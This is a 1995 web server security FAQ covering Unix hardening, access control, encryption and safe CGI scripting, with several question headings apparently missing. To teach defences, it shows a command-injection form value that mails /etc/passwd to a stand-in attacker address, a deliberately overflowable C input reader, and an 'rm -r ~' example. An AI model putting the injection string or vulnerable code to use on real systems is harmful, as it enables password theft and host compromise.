.htaccess to control
access in individual directories is so convenient, why
should I use access.conf?
Copies of this document can be obtained at:
The author of this FAQ has very limited experience with the Macintosh and Windows servers. Web servers for these operating systems are pretty new, and there hasn't been much time for collective wisdom on the security issues for these platforms to form. I apologize for the pronounced Unix (and Linux) bias in this document. Help in fleshing out these topics is welcomed!
Much of this document is abstracted from the author's book "How to Set Up and Maintain a World Wide Web Site", published by Addison-Wesley.
This document is © copyright 1995, Lincoln D. Stein. However it may be freely reprinted and redistributed.
Many thanks to the following people for their helpful comments and contributions to this document:
It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes.
Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole.
Unix systems, with their large number of built-in servers, services, scripting languages, and interpreters, are particularly vulnerable to attack because there are simply so many portals of entry for hackers to exploit. Less capable systems, such as Macintoshes and MS-Windows machines, are less easy to exploit. Then again it's harder to accomplish really cool stuff on these machines, so you have a tradeoff between convenience and security.
Of course you always have to factor in the experience of the people running the server host and software. A Unix system administered by a seasoned Unix administrator will probably be more secure than an MS-Windows system set up by a novice.
Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server (available at http://hoohoo.ncsa.uiuc.edu/) or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA ( http://www.hyperreal.com/apache/info.html) is also free of this bug.
Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.
The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed. Information on WN's security features can be found in its online documentation at:
http://hopf.math.nwu.edu/docs/security.html
A table comparing the features of a large number of commercial, freeware and public domain servers has been put together by Paul Hoffman and is also available online:
http://www.proper.com/www/servers-chart.html
Server side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.
ftp://ftp.cert.org/pub/tools/crack/
3. Turn off unused services. For example, if you don't need to run FTP on the Web server host, physically remove the ftp daemon. Likewise for tftp, sendmail, gopher, NIS (network information services) clients, NFS (networked file system), finger, systat, and anything else that might be hanging around. Check the file /etc/inetd.conf for a list of daemons that may be lurking, and comment out the ones you don't use.
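As a sketch, here is what the relevant portion of /etc/inetd.conf might look like after commenting out unneeded daemons. The exact service lines and daemon paths vary from system to system; these entries are illustrative only:

```
# /etc/inetd.conf -- comment out services you don't need, then send
# inetd a HUP signal (kill -HUP <inetd's pid>) to make it reread the file.
#ftp     stream  tcp   nowait  root    /usr/sbin/ftpd     ftpd -l
#tftp    dgram   udp   wait    root    /usr/sbin/tftpd    tftpd
#finger  stream  tcp   nowait  nobody  /usr/sbin/fingerd  fingerd
#systat  stream  tcp   nowait  nobody  /bin/ps            ps -auwwx
```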
4. Remove shells and interpreters that you don't absolutely need. For example, if you don't run any Perl-based CGI scripts, remove the Perl interpreter.
5. Check both the system and Web logs regularly for suspicious activity. The program Tripwire is helpful for scanning the system logs and sensitive files for break-in attempts:
ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/
More on scanning Web logs for suspicious activity below.
6. Make sure that permissions are set correctly on system files, to discourage tampering. The program COPS is useful for this:
ftp://ftp.cert.org/pub/tools/cops/
Be alert to the possibility that a _local_ user can accidentally make a change to the Web server configuration file or the document tree that opens up a security hole. You should set file permissions in the document and server root directories such that only trusted local users can make changes. Many sites create a "www" group to which trusted Web authors are added. The document root is made writable only by members of this group. To increase security further, the server root where vital configuration files are kept, is made writable only by the official Web administrator. Many sites create a "www" user for this purpose.
A good source of timely information, including the discovery of new security holes, is the CERT Coordination Center advisories, posted to the newsgroup comp.security.announce, and archived at:
ftp://ftp.cert.org/pub/cert_advisories/
A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:
SUBSCRIBE www-security your_email_address
A series of security FAQs is maintained by Internet Security Systems, Inc. The FAQs can be found at:
http://www.iss.net/iss/faq.html
The main WWW FAQ also contains questions and answers relevant to Web security, such as log file management and sources of server software. The most recent version of this FAQ can be found at:
http://sunsite.unc.edu/boutell/faq/www_faq.html
You need to protect the server from the prying eyes of both local and remote users. The simplest strategy is to create a "www" user for the Web administration/webmaster and a "www" group for all the users on your system who need to author HTML documents. On Unix systems edit the /etc/passwd file to make the server root the home directory for the www user. Edit /etc/group to add all authors to the www group.
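As an illustration, the corresponding entries might look like this (the paths, uid/gid numbers, and user names are examples only; adapt them to your system):

```
# /etc/passwd -- a "www" user whose home directory is the server root:
www:*:401:401:Web Administrator:/usr/local/etc/httpd:/bin/sh

# /etc/group -- a "www" group containing the trusted Web authors:
www:*:401:www,lstein,fred
```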
The server root should be set up so that only the www user can write to the configuration and log directories and to their contents. It's up to you whether you want these directories to also be readable by the www group. They should _not_ be world readable. The cgi-bin directory and its contents should be world executable and readable, but not writable (if you trust them, you could give local Web authors write permission for this directory). Following are the permissions for a sample server root:
drwxr-xr-x   5 www      www          1024 Aug  8 00:01 cgi-bin/
drwxr-x---   2 www      www          1024 Jun 11 17:21 conf/
-rwx------   1 www      www        109674 May  8 23:58 httpd
drwxrwxr-x   2 www      www          1024 Aug  8 00:01 htdocs/
drwxrwxr-x   2 www      www          1024 Jun  3 21:15 icons/
drwxr-x---   2 www      www          1024 May  4 22:23 logs/

The Netsite Commerce Server appears to contain a bug that prevents you from setting up the server root with correct permissions. In order to start up, this server requires that the logs directory either be writable by the "nobody" user, or that a log file writable by the "nobody" user already exist in that directory. In either case this represents a security hole, because it means that a remote user who has infiltrated the system by subverting a CGI script or the server itself can cover his tracks by modifying or deleting the access log file. It is not known if this bug affects the Netsite (non-Commerce) Server. (Thanks to Laura Pearlman for this information.)
The document root has different requirements. All files that you want to serve on the Internet must be readable by the server while it is running under the permissions of user "nobody". You'll also usually want local Web authors to be able to add files to the document root freely. Therefore you should make the document root directory and its subdirectories owned by user and group "www", world readable, and group writable:
drwxrwxr-x   3 www      www          1024 Jul  1 03:54 contents
drwxrwxr-x  10 www      www          1024 Aug 23 19:32 examples
-rw-rw-r--   1 www      www          1488 Jun 13 23:30 index.html
-rw-rw-r--   1 lstein   www         39294 Jun 11 23:00 resource_guide.html
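A sketch of the commands that produce document-root permissions like these. It is demonstrated here on a scratch directory; in real use you would run the commands as root against your actual document root, and the chown/chgrp step assumes a "www" user and group already exist:

```shell
# Create a scratch document root for demonstration purposes.
mkdir -p /tmp/htdocs-demo/contents
echo "<TITLE>demo</TITLE>" > /tmp/htdocs-demo/index.html

# Directories: owner and group writable, world readable (drwxrwxr-x).
chmod 775 /tmp/htdocs-demo /tmp/htdocs-demo/contents

# Files: owner and group writable, world readable (-rw-rw-r--).
chmod 664 /tmp/htdocs-demo/index.html

# In real use, also assign everything to the www user and group:
# chown -R www /tmp/htdocs-demo && chgrp -R www /tmp/htdocs-demo

ls -l /tmp/htdocs-demo
```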
Many servers allow you to restrict access to parts of the document tree to Internet browsers with certain IP addresses or to remote users who can provide a correct password (see below). However, some Web administrators may be worried about unauthorized _local_ users gaining access to restricted documents present in the document root. This is a problem when the document root is world readable.
One solution to this problem is to run the server as something other than "nobody", for example as another unprivileged user ID that belongs to the "www" group. You can now make the restricted documents group- but not world-readable (don't make them group-writable unless you want the server to be able to overwrite its documents!). The documents are now protected from prying eyes both locally and globally. Remember to set the read and execute permissions for any restricted server scripts as well.
The CERN server generalizes this solution by allowing the server to execute under different user and group privileges for each part of a restricted document tree. See the CERN documentation for details on how to set this up.
Of course, turning off automatic directory listings doesn't prevent people from fetching files whose names they guess at. It also doesn't avoid the pitfall of an automatic text keyword search program that inadvertently adds the "hidden" file to its index. To be safe, you should remove unwanted files from your document root entirely.
The NCSA and Apache servers allow you to turn symbolic link following off completely. Another option allows you to enable symbolic link following only if the owner of the link matches the owner of the link's target (i.e. you can compromise the security of a part of the document tree that you own, but not someone else's part).
Options IncludesNoExec
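To sketch how these options fit together, here is an access.conf fragment for the NCSA/Apache family that disables the exec form of server-side includes and restricts symbolic link following as described above. The directory path is illustrative; check your server's documentation for the options it actually supports:

```
# access.conf -- for the document root: allow includes but not the
# exec directive, and follow symbolic links only when the link and
# its target have the same owner.
<Directory /usr/local/etc/httpd/htdocs>
Options Indexes IncludesNoExec SymLinksIfOwnerMatch
</Directory>
```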
This is not the scenario that people warn about when they talk about "running the server as root". This warning is about servers that have been configured to run their _child processes_ as root (e.g. by specifying "User root" in the server configuration file). This is a whopping security hole because every CGI script that gets launched with root permissions will have access to every nook and cranny in your system.
Some people will say that it's better not to start the server as root at all, warning that we don't know what bugs may lurk in the portion of the server code that controls its behavior between the time it starts up and the time it forks a child. This is quite true, although the source code to all the public domain servers is freely available and there don't _seem_ to be any bugs in these portions of the code. Running the server as an ordinary unprivileged user may be safer. Many sites launch the server as user "nobody", "daemon" or "www". However you should be aware of two potential problems with this approach:
Consider this scenario: a WWW server has been configured to execute any file ending with the extension ".cgi". Using your ftp daemon, a remote hacker uploads a perl script to your ftp site and gives it the .cgi extension. He then uses his browser to request the newly-uploaded file from your Web server. Bingo! He's fooled your system into executing the commands of his choice.
You can overlap the ftp and Web server hierarchies, but be sure to limit ftp uploads to an "incoming" directory that can't be read by the "nobody" user.
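A sketch of such an "incoming" directory: mode 733 grants write and search permission but no read permission, so uploads are accepted but the directory cannot be listed. The path here is for demonstration; in real use the directory lives under your ftp root and is owned by the ftp administrator:

```shell
# Create an upload directory that can't be listed or read back
# (drwx-wx-wx: write+search for group and other, but no read).
mkdir -p /tmp/ftp-demo/incoming
chmod 733 /tmp/ftp-demo/incoming

ls -ld /tmp/ftp-demo/incoming
```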
In order to run a server in a chroot environment, you have to create a whole miniature root file system that contains everything the server needs access to. This includes special device files and shared libraries. You also need to adjust all the path names in the server's configuration files so that they are relative to the new root directory. To start the server in this environment, place a shell script around it that invokes the chroot command in this way:
chroot /path/to/new/root /server_root/httpd

Setting up the new root directory can be tricky and is beyond the scope of this document. See the author's book (above) for details. You should be aware that a chroot environment is most effective when the new root directory is as barren as possible. There shouldn't be any interpreters, shells, or configuration files (including /etc/passwd!) in the new root directory. Unfortunately this means that CGI scripts that rely on Perl or shells won't run in the chroot environment. You can add these interpreters back in, but you lose some of the benefits of chroot.
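As a rough sketch, building the skeleton of such a miniature root might look like the following. All paths are illustrative; a real setup also needs the device files (created with mknod) and any shared libraries the server binary requires, and must be performed as root:

```shell
# Skeleton of a miniature root file system for a chroot'd server.
NEWROOT=/tmp/chroot-demo
mkdir -p $NEWROOT/dev $NEWROOT/etc $NEWROOT/lib \
         $NEWROOT/server_root/conf $NEWROOT/server_root/logs \
         $NEWROOT/server_root/htdocs

# Copy in the server binary and its configuration (illustrative paths):
# cp /usr/local/etc/httpd/httpd $NEWROOT/server_root/
# cp httpd.conf srm.conf access.conf $NEWROOT/server_root/conf/

# Then start the server inside the new root (as root):
# chroot $NEWROOT /server_root/httpd

ls $NEWROOT
```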
Also be aware that chroot only protects files; it's not a panacea. It doesn't prevent hackers from breaking into your system in other ways, such as grabbing system maps from the NIS network information service, or playing games with NFS.
other hosts
\
server <-----> FIREWALL <------> OUTSIDE
/
other hosts
However, if you want to make the server available to the rest of the world, you'll need to place it somewhere outside the firewall. From the standpoint of security of your organization as a whole, the safest place to put it is completely outside the local area network:
other hosts
\
other hosts <----> FIREWALL <---> server <----> OUTSIDE
/
other hosts
This is called a "sacrificial lamb" configuration. The server is at risk of being broken into, but at least when it's broken into it doesn't breach the security of the inner network.
It's _not_ a good idea to run the WWW server on the firewall machine itself. Any bug in the server would then compromise the security of the entire organization.
There are a number of variations on this basic setup, including architectures that use paired "inner" and "outer" servers to give the world access to public information while giving the internal network access to private documents. See the author's book for the gory details.
ftp://ftp.tis.com/firewalls/toolkit/
The CERN server can also be configured to act as a proxy. I feel much less comfortable recommending it, however, because it is a large and complex piece of software that may contain unknown security holes.
More information about firewalls is available in the books Firewalls and Internet Security by William Cheswick and Steven Bellovin, and Building Internet Firewalls by D. Brent Chapman and Elizabeth D. Zwicky.
ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/
You should also check your access and error log files periodically for suspicious activity. Look for accesses involving system commands such as "rm", "login", "/bin/sh" and "perl", or extremely long lines in URL requests (the former indicate an attempt to trick a CGI script into invoking a system command; the latter an attempt to overrun a program's input buffer). Also look for repeated unsuccessful attempts to access a password protected document. These could be symptomatic of someone trying to guess a password.
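A sketch of this kind of log scan. The log file name and the entries in it are made up for illustration; adapt the patterns to whatever your own logs show:

```shell
# Build a tiny sample access log to scan (illustrative entries).
cat > /tmp/access_log.demo <<'EOF'
remote1.host.com - - [10/Aug/1995:00:01:02] "GET /index.html HTTP/1.0" 200 1488
evil.host.com - - [10/Aug/1995:00:01:03] "GET /cgi-bin/query?q=x%0a/bin/sh HTTP/1.0" 200 0
EOF

# Look for shell and system command names embedded in requests:
egrep '/bin/sh|perl|rm |login' /tmp/access_log.demo

# Look for suspiciously long request lines (possible buffer overrun):
awk 'length($0) > 500' /tmp/access_log.demo
```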
Individual documents or whole directories are protected in such a way that only browsers connecting from certain IP (Internet) addresses, IP subnets, or domains can access them.
Documents or directories are protected so that the remote user has to provide a name and password in order to get access.
Both the request for the document and the document itself are encrypted in such a way that the text cannot be read by anyone but the intended recipient. Public key cryptography can also be used for reliable user verification. See below.
One thing to be aware of is that if a browser is set to use a proxy server to fetch documents, then your server will only know about the IP address of the proxy, not the real user's. This means that if the proxy is in a trusted domain, anyone can use that proxy to access your site. Unless you know that you can trust a particular proxy to do its own restriction, don't add the IP address of a proxy (or a domain containing a proxy server) to the list of authorized addresses.
Restriction by host or domain name has the same risks as restriction by IP address, but also suffers from the risk of "DNS spoofing", an attack in which your server is temporarily fooled into thinking that a trusted host name belongs to an alien IP address. To lessen that risk, some servers can be configured to do an extra DNS lookup for each client. After translating the IP address of the incoming request to a host name, the server uses the DNS to translate from the host name back to the IP address. If the two addresses don't match, the access is forbidden. See below for instructions on enabling this feature in NCSA's httpd.
Another problem is that the password is vulnerable to interception as it is transmitted from browser to server. It is not encrypted in any meaningful way, so a hacker with the right hardware and software can pull it off the Internet as it passes through. Furthermore, unlike a login session, in which the password is passed over the Internet just once, a browser sends the password each and every time it fetches a protected document. This makes it easier for a hacker to intercept the transmitted data as it flows across the Internet. To avoid this, you have to encrypt the data. See below.
If you need to protect documents against _local_ users on the server's host system, you'll need to run the server as something other than "nobody" and to set the permissions of both the restricted documents and server scripts so that they're not world readable. See Q9.
<Directory /full/path/to/directory>
<Limit GET POST>
order mutual-failure
deny from all
allow from 192.198.2 .zoo.org
allow from 18.157.0.5 stoat.outback.au
</Limit>
</Directory>
This will deny access to everybody but the indicated hosts (18.157.0.5 and stoat.outback.au), subnets (192.198.2) and domains (.zoo.org). Although you can use either numeric IP addresses or host names, it's safer to use the numeric form because this form of identification is less easily subverted (Q18).
One way to increase the security of restriction by domain name is to make sure that your server double-checks the results of its DNS lookups. You can enable this feature in NCSA's httpd (and the related Apache server) by making sure that the -DMAXIMUM_DNS flag is set in the Makefile.
For the CERN server, you'll need to declare a protection scheme with the Protection directive, and associate it with a local URL using the Protect directive. An entry in httpd.conf that limits access to certain domains might look like this:
Protection LOCAL-USERS {
GetMask @(*.capricorn.com, *.zoo.org, 18.157.0.5)
}
Protect /relative/path/to/directory/* LOCAL-USERS
Check your server documentation for the precise details of how to add new users. For NCSA httpd, you can add a new user to the password file using the htpasswd program that comes with the server software:
htpasswd /path/to/password/file username

htpasswd will then prompt you for the password to use. The first time you invoke htpasswd you must provide a -c flag to create the password file from scratch.
The CERN server comes with a slightly different program called htadm:
htadm -adduser /path/to/password/file username

htadm will then prompt you for the new password.
After you add all the authorized users, you can attach password protection to the directories of your choice. In NCSA httpd and its derivatives, add something like this to access.conf:
<Directory /full/path/to/protected/directory>
AuthName name.of.your.server
AuthType Basic
AuthUserFile /usr/local/etc/httpd/conf/passwd
<Limit GET POST>
require valid-user
</Limit>
</Directory>
You'll need to replace AuthUserFile with the full path to the password file. This type of protection can be combined with IP address restriction as described in the previous section. See NCSA's online documentation (http://hoohoo.ncsa.uiuc.edu/) or the author's book for more details.
For the CERN server, the corresponding entry in httpd.conf looks like this:
Protection AUTHORIZED-USERS {
AuthType Basic
ServerID name.of.your.server
PasswordFile /usr/local/etc/httpd/conf/passwd
GetMask All
}
Protect /relative/path/to/directory/* AUTHORIZED-USERS
Again, see the documentation or the author's book for details.
http://your.site.com/protected/directory/.htaccess

This is clearly an undesirable feature, since it gives out important information about your system, including the location of the server password file.
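One partial workaround, sketched here for NCSA httpd and its derivatives, is to use the AccessFileName directive in srm.conf to give the per-directory control file a less guessable name (the name below is just an example):

```
# srm.conf -- use a non-obvious name for per-directory access
# control files instead of the well-known ".htaccess".
AccessFileName .acl-conf
```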
Another problem with the per-directory access files is that if you ever need to change the server software, it's a lot easier to update a single central access control file than to search and fix a hundred small files.
Most practical implementations of secure Internet encryption actually combine the traditional symmetric and the new asymmetric schemes. Public key encryption is used to negotiate a secret symmetric key that is then used to encrypt the actual data.
Since commercial ventures have a critical need for secure transmission on the Web, there is very active interest in developing schemes for encrypting the data that passes between browser and server.
More information on public key cryptography can be found in the book "Applied Cryptography", by Bruce Schneier.
SSL (Secure Socket Layer) is the scheme proposed by Netscape Communications Corporation. It is a low level encryption scheme used to encrypt transactions in higher-level protocols such as HTTP, NNTP and FTP. The SSL protocol includes provisions for server authentication (verifying the server's identity to the client), encryption of data in transit, and optional client authentication (verifying the client's identity to the server). SSL is currently implemented commercially only for Netscape browsers and some Netscape servers. (While both the data encryption and server authentication parts of the SSL protocol are implemented, client authentication is not yet available.) Open Market, Inc. has also announced plans to support SSL in a forthcoming version of their HTTP server. Details on SSL can be found at:
http://home.netscape.com/info/SSL.html
SHTTP (Secure HTTP) is the scheme proposed by CommerceNet, a coalition of businesses interested in developing the Internet for commercial uses. It is a higher level protocol that only works with the HTTP protocol, but is potentially more extensible than SSL. Currently SHTTP is implemented for the Open Marketplace Server marketed by Open Market, Inc on the server side, and Secure HTTP Mosaic by Enterprise Integration Technologies on the client side. See here for details:
http://www.commerce.net/information/standards/drafts/shttp.txt
Shen is a scheme proposed by Phillip Hallam-Baker of CERN. Like SHTTP, it is a high-level replacement for the existing HTTP protocol. It hasn't yet been implemented in production-quality software. You can read about it at:
http://www.w3.org/hypertext/WWW/Shen/ref/security_spec.html
Even with an encrypting server, you should be careful about what happens to the credit card number after it's received by the server. For example, if the number is received by a server script, make sure not to write it out to a world-readable log file or send it via e-mail to a remote site.
These are all schemes that have been developed to process commercial transactions over the Web without transmitting credit card numbers.
In the First Virtual scheme, designed for low- to medium-priced software sales and fee-for-service information purchases, the user signs up for a First Virtual account by telephone. During the sign-up procedure he provides his credit card number and contact information, and receives a First Virtual account number in return. Thereafter, to make purchases at participating online vendors, the user provides his First Virtual account number in lieu of his credit card information. First Virtual later contacts him by e-mail, and he has the chance to approve or disapprove the purchase before his credit card is billed. First Virtual is in operation now and requires no special software or hardware on the user's or merchant's sides of the connection. More information can be obtained at:
Digicash, a product of the Netherlands Digicash company, is a debit system something like an electronic checking account. In this system, users make an advance lump sum payment to a bank that supports the DigiCash system, and receive "E-cash" in turn. Users then make purchases electronically and the E-cash is debited from their checking accounts. This system is currently in development and has not been released for public use. It also appears to require special client software to be installed on both the user's and the merchant's computers. For more information:
Cybercash, invented by the Cybercash Corporation, is both a debit and a credit card system. In credit card mode, the user installs specialized software on his computer. When the WWW browser needs to obtain a credit card number, it invokes the Cybercash software which pops up a window that requests the number. The number is then encrypted and transmitted to corresponding software installed on the merchant's machine. In debit mode, a connection is established to a participating bank. Cybercash is in the pilot phase, and more information can be obtained at:
In addition to these forms of credit card payment, the Netscape Communications Corporation has made deals with both First Data, a large credit card processor, and MasterCard to incorporate credit card processing into the Netscape/Netsite combination. These arrangements, when implemented, will use Netscape's built-in encryption to encode and approve credit card purchases without additional software. For more information, check the literature at:
Open Market, Inc., is also offering credit card purchases. In this scheme, Open Market acts as the credit card company itself, handling subscriptions, billing and accounting. The scheme is integrated into its Open Marketplace Server, and requires a browser that supports the SHTTP protocol (only Secure Mosaic, at the moment). This service too is in the pilot stage. More information is available from Open Market at:
CGI scripts can present security holes in two ways:
CGI scripts are potential security holes even though you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high numbered port (it just needs to execute a few commands in Perl to accomplish this). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.
There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A tightly controlled cgi-bin directory lessens the possibility of this happening.
First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.
Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:
http://your-site/a/path/your_script.cgi~
(This is another good reason to limit CGI scripts to cgi-bin and to make sure that cgi-bin is separate from the document root.)
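A sketch of how to hunt down editor backup and autosave files in the document tree. The document root path and file names are illustrative; once you've reviewed the list, uncomment the removal step:

```shell
# Scratch document root with a script and two editor leftovers.
DOCROOT=/tmp/docroot-demo
mkdir -p $DOCROOT
touch $DOCROOT/your_script.cgi \
      $DOCROOT/your_script.cgi~ \
      "$DOCROOT/#your_script.cgi#"

# List Emacs backup (*~), autosave (#*#) and other backup files:
find $DOCROOT \( -name '*~' -o -name '#*#' -o -name '*.bak' \) -print

# After reviewing the list, delete them:
# find $DOCROOT \( -name '*~' -o -name '#*#' -o -name '*.bak' \) -exec rm {} \;
```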
Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.
Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.
A third consideration is that the scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are poor choices for anything more than trivial CGI programs.
All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail show. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by people other than the author. Furthermore, Perl contains a number of built-in features designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make a Perl script safer in some respects than the equivalent C program.
You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.
Things to think about when you examine a script:
The holes in these scripts were discovered by Paul Phillips (paulp@cerf.net), who also wrote the CGI security FAQ. Check here for reports of other buggy scripts.
In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.
This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public. Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.
Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.
A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:
#include <stdlib.h>
#include <stdio.h>

static char query_string[1024];

char* read_POST() {
   int query_size;
   query_size=atoi(getenv("CONTENT_LENGTH"));
   fread(query_string,query_size,1,stdin);
   return query_string;
}

The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.
Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:
char* read_POST() {
   int query_size=atoi(getenv("CONTENT_LENGTH"));
   char* query_string = (char*) malloc(query_size+1);
   if (query_string != NULL) {
      fread(query_string,query_size,1,stdin);
      query_string[query_size]='\0';  /* fread() does not null-terminate */
   }
   return query_string;
}
Of course, once you've read in the data, you should continue to make
sure your buffers don't overflow. Watch out for strcpy(), strcat()
and other string functions that blindly copy strings until they reach
the end. Use the strncpy() and strncat() calls instead.
#define MAXSTRINGLENGTH 256

char myString[MAXSTRINGLENGTH];
char* query = read_POST();
myString[MAXSTRINGLENGTH-1]='\0';           /* ensure null byte */
strncpy(myString,query,MAXSTRINGLENGTH-1);  /* don't overwrite null byte */

(Note that the semantics of strncpy() are nasty when the input string is MAXSTRINGLENGTH-1 bytes long or longer: it does not null-terminate the destination, which is why the fiddling with the terminating NULL above is necessary.)
In C this includes the popen() and system() calls, both of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.
Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.
The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.
$mail_to = &get_name_from_input; # read the address from form
open (MAIL,"| /usr/lib/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: me\n\nHi there!\n";
close MAIL;

The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wily hacker passes an e-mail address that looks like this?
nobody@nowhere.com;mail badguys@hell.org</etc/passwd;
Now the open() statement will evaluate the following command:
/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to a password cracking attack.
A safer version passes sendmail the -t flag, telling it to take the recipient's address from the mail header rather than from the command line:

$mail_to = &get_name_from_input; # read the address from form
open (MAIL,"| /usr/lib/sendmail -t -oi");
print MAIL <<END;
To: $mail_to
From: me (me\@nowhere.com)
Subject: nothing much

Hi there!
END
close MAIL;

C programmers can use the exec family of commands to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.
You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. In fact, it's wise policy to make sure that all user input arguments are what you expect. Even if you don't pass user variables through the shell, you can never be sure that they don't contain constructions that reveal bugs in the programs you're calling.
For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:
$mail_to = &get_name_from_input; # read the address from form
unless ($mail_to =~ /^[\w.-]+\@[\w.-]+$/) {
    die "Address not in form foo\@nowhere.com";
}
(This particular pattern match may be too restrictive for some sites.
It doesn't allow UUCP-style addresses or any of the many alternative
addressing schemes).
system("ls -l /local/web/foo");
use this:
system("/bin/ls -l /local/web/foo");
If you must rely on the PATH, set it yourself at the beginning of your
CGI script:
putenv("PATH=/bin:/usr/bin:/usr/local/bin");
In general it's not a good idea to put the current directory (".") into the path.
This is not quite true. cgiwrap (by Nathan Neulinger <nneul@umr.edu>, http://www.umr.edu/~cgiwrap) was designed for multi-user sites like university campuses where local users are allowed to create their own scripts. Since CGI scripts run under the server's user ID (e.g. "nobody"), it is difficult under these circumstances for administrators to determine whose script is generating bounced mail, errors in the server log, or annoying messages on other users' screens. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script.
cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. Although this simplifies administration and prevents users from interfering with each other, it does put the individual user at tremendous risk. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command
rm -r ~
Worse, since the subverted CGI script has write access to the user's home directory, it could place a trojan horse in the user's directory that will subvert the security of the entire system. The "nobody" user, at least, usually doesn't have write permission anywhere.
When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.
http://www.primus.com/staff/paulp/cgi-security/
CGI security is also covered by documentation maintained at NCSA:
http://hoohoo.ncsa.uiuc.edu/cgi/security.html
$date = `/bin/date`;
You can open up a pipe to a program:
open (SORT, "| /usr/bin/sort | /usr/bin/uniq");

You can invoke an external program and wait for it to return with system():
system "/usr/bin/sort < foo.in";

or you can invoke an external program and never return with exec():
exec "/usr/bin/sort < foo.in";

